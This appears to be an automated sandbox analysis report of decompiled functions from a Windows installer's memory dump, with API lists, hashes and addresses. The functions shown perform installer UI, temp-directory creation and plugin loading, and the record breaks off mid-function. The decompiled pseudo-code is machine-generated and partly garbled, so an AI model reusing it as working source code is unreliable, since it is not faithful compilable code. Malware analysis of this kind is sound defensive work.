Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
Opcode Fuzzy Hash: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98

Uniqueness

Uniqueness Score: -1.00%

Function 00404992, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404992(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x004049a0
0x004049ad
0x004049b3
0x004049f1
0x004049f1
0x00404a00
0x00404a07
0x00000000
0x00404a09
0x004049b5
0x004049c4
0x004049cc
0x004049cf
0x004049e1
0x004049e7
0x004049ee
0x00000000
0x004049ee
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
GetMessagePos.USER32 ref: 004049B5
ScreenToClient.USER32 ref: 004049CF
SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07

Strings

f, xrefs: 004049E3

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402C7C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C7C(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x415420; // 0xffe4dc
					_t11 =  *0x42142c; // 0xffe4e0
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402c89
0x00402c97
0x00402c9d
0x00402c9d
0x00402cab
0x00402cad
0x00402cb3
0x00402cba
0x00402cbc
0x00402cbc
0x00402cd2
0x00402ce2
0x00402cf4
0x00402cf4
0x00402cfc

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
MulDiv.KERNEL32(00FFE4DC,00000064,00FFE4E0), ref: 00402CC2
wsprintfA.USER32 ref: 00402CD2
SetWindowTextA.USER32(?,?), ref: 00402CE2
SetDlgItemTextA.USER32 ref: 00402CF4

Strings

verifying installer: %d%%, xrefs: 00402CCC

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040558D, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040558D(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40837c;
				_v36.Group = 0x40837c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40836c;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405598
0x0040559c
0x0040559f
0x004055a5
0x004055a9
0x004055ad
0x004055b5
0x004055bc
0x004055c2
0x004055c9
0x004055d8
0x004055da
0x00000000
0x004055da
0x004055e4
0x004055eb
0x00405601
0x00000000
0x00000000
0x00000000
0x00405603
0x00405607

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
GetLastError.KERNEL32 ref: 004055E4
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
GetLastError.KERNEL32 ref: 00405603

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004055B3
C:\Users\user\Desktop, xrefs: 0040558D

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-3254906087
Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction ID: 31ed81618c477e33f581cc85a0b23cfa0e691b84649e5a94383732ec19bc7550
Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
Instruction Fuzzy Hash: 4E011A71C00219EADF109FA1C9047EFBBB8EF14355F10803AD545B6290DB799609CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401D9B, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401D9B(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402AA9(2);
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				0x40b818->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b828 = E00402AA9(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x3c)) = _t30;
				 *0x40b82f = 1;
				 *0x40b82c = _t15 & 0x00000001;
				 *0x40b82d = _t15 & 0x00000002;
				 *0x40b82e = _t15 & 0x00000004;
				E00405FC2(_t9, _t31, _t33, 0x40b834,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b818);
				_push(_t18);
				_push(_t33);
				E00405EFE();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401d9b
0x00401da6
0x00401da8
0x00401db5
0x00401dcc
0x00401dd1
0x00401dde
0x00401de3
0x00401de7
0x00401df2
0x00401df9
0x00401e0b
0x00401e11
0x00401e16
0x00401e20
0x0040257d
0x00401569
0x004028ff
0x0040295a
0x00402966

APIs

GetDC.USER32(?), ref: 00401D9E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
ReleaseDC.USER32 ref: 00401DD1
CreateFontIndirectA.GDI32(0040B818), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e66b643645ae5869d7f803f1a931f06999308b12a2e1552bce617188d2388566
Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
Opcode Fuzzy Hash: e66b643645ae5869d7f803f1a931f06999308b12a2e1552bce617188d2388566
Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401D41, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D41(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x48);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402ACB(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x20),  *(_t27 - 0x3c) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d4b
0x00401d52
0x00401d81
0x00401d89
0x00401d90
0x00401d90
0x0040295a
0x00402966

APIs

GetDlgItem.USER32 ref: 00401D45
GetClientRect.USER32 ref: 00401D52
LoadImageA.USER32 ref: 00401D73
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
DeleteObject.GDI32(00000000), ref: 00401D90

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: d4ea3eedd7e0ab08dfd96102332ab40a2100fbec6385613e2138e30b6095d9ec
Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
Opcode Fuzzy Hash: d4ea3eedd7e0ab08dfd96102332ab40a2100fbec6385613e2138e30b6095d9ec
Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38

Uniqueness

Uniqueness Score: -1.00%

Function 00401C0A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C0A(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402AA9(3);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402AA9(4);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402ACB(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402ACB(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402ACB();
					_t32 = E00402ACB();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402AA9();
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t41 = E00402AA9(2);
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00405EFE();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c0a
0x00401c0c
0x00401c13
0x00401c16
0x00401c19
0x00401c23
0x00401c27
0x00401c2a
0x00401c33
0x00401c33
0x00401c36
0x00401c3a
0x00401c43
0x00401c43
0x00401c46
0x00401c4a
0x00401c4c
0x00401ca1
0x00401ca3
0x00401cac
0x00401cb4
0x00401cb7
0x00401cb7
0x00401cc0
0x00000000
0x00401c4e
0x00401c55
0x00401c57
0x00401c5a
0x00401c60
0x00401c67
0x00401c6a
0x00401c92
0x00401cc6
0x00401cc6
0x00401c6c
0x00401c7a
0x00401c82
0x00401c85
0x00401c85
0x00401c6a
0x00401cc9
0x00401ccc
0x00401cd2
0x004028ff
0x004028ff
0x0040295a
0x00402966

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28

Uniqueness

Uniqueness Score: -1.00%

Function 00404888, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404888(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405FC2(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405FC2(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405FC2(_t41, _t47, 0x42a870, 0x42a870, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a870), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebd8, _a4, 0x42a870);
			}

0x0040488e
0x00404893
0x0040489b
0x0040489c
0x004048a9
0x004048b1
0x004048b2
0x004048b4
0x004048b6
0x004048b8
0x004048bb
0x004048bb
0x004048c2
0x004048c8
0x004048c8
0x004048cf
0x004048d6
0x004048d9
0x004048dc
0x004048dc
0x004048e0
0x004048f0
0x004048f2
0x004048f5
0x0040489e
0x0040489e
0x004048a5
0x004048a5
0x004048fd
0x00404908
0x0040491e
0x0040492e
0x0040494a

APIs

lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
wsprintfA.USER32 ref: 0040492E
SetDlgItemTextA.USER32 ref: 00404941

Strings

%u.%u%s%s, xrefs: 00404910

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 3c4f388065fd84cb694f5cf3247e00f86c36fc154983ed31d8b13ba5f8e83c02
Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
Opcode Fuzzy Hash: 3c4f388065fd84cb694f5cf3247e00f86c36fc154983ed31d8b13ba5f8e83c02
Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9

Uniqueness

Uniqueness Score: -1.00%

Function 00405938, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405938(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405939
0x00405950
0x00405958
0x00405958
0x00405960

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 0040593E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405947
lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405958

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405938

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction ID: 7219f54bd6567b4b537029212711971aeb7da606d1672e2911cb7cc87ef8a5af
Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction Fuzzy Hash: 90D0A7A2102A31AAE10127154C05DCF6A08CF023507040036F200B2191C73C0D418BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00402003, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00402003(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4d8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4a8 =  *0x42f4a8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402ACB(0xfffffff0);
				 *(_t34 + 8) = E00402ACB(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E004050C7(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b858, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040376E(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00402003
0x00402003
0x00402008
0x0040200f
0x004020ca
0x0040223d
0x0040223d
0x00402957
0x0040295a
0x00402966
0x00402966
0x0040201e
0x00402028
0x0040202b
0x0040203a
0x00402044
0x00402048
0x004020c3
0x00000000
0x004020c3
0x0040204a
0x00402053
0x00402057
0x0040209b
0x00402059
0x0040205c
0x0040205f
0x0040208f
0x00402061
0x00402064
0x0040206d
0x0040206f
0x0040206f
0x0040206d
0x0040205f
0x004020a3
0x004020b8
0x004020b8
0x00000000
0x004020a3
0x00402034
0x00402038
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202E

Part of subcall function 004050C7: lstrlenA.KERNEL32(0042A050,00000000,00555CB4,74B5EA30,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,0042A050,00000000,00555CB4,74B5EA30,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
Part of subcall function 004050C7: lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,00555CB4,74B5EA30), ref: 00405123
Part of subcall function 004050C7: SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203E
GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 70d01e2126ec03a25204f8f07fb16c17cf5fdd1b904ffdbe767f122561c80d80
Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
Opcode Fuzzy Hash: 70d01e2126ec03a25204f8f07fb16c17cf5fdd1b904ffdbe767f122561c80d80
Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00402BCD, Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402BCD(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
